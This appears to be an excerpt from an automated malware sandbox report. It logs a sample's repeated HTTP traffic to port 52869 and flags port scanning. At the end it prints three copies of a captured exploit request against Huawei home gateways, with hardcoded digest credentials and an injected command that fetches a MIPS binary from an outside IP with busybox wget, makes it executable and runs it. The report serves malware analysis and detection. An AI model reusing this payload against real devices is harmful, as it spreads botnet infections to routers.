    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54844 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53970 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53976 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54542 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54550 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 57466
    Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52892 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45302 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 57468
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37590 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45032 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59916 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40054 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Connects to many ports of the same IP (likely port scanning)Show sources
    Source: global trafficTCP traffic: 91.254.99.65 ports 2,5,6,8,9,52869
    Source: global trafficTCP traffic: 91.186.147.224 ports 2,5,6,8,9,52869
    Source: global trafficTCP traffic: 91.21.105.249 ports 2,5,6,8,9,52869
    Source: global trafficTCP traffic: 185.174.174.71 ports 2,5,6,8,9,52869
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
